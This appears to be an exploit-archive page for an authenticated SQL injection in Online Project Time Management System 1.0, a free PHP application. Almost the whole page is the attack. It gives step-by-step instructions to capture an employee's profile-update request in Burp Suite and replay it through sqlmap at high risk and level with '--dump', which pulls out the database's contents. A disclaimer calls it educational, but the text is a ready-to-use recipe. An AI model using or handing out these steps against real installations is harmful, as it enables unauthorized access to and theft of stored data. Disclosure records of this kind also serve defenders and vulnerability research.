Online project time management system 1.0 sqli (authenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2022-01-25 |
Type : webapps |
Platform : php
This exploit / vulnerability Online project time management system 1.0 sqli (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated)
# Date: 19/01/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Kali Linux
# Steps to reproduce
# Log in as an employee
# Go to : http://localhost/ptms/?page=user
# Click Update
# Save request in BurpSuite
# Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump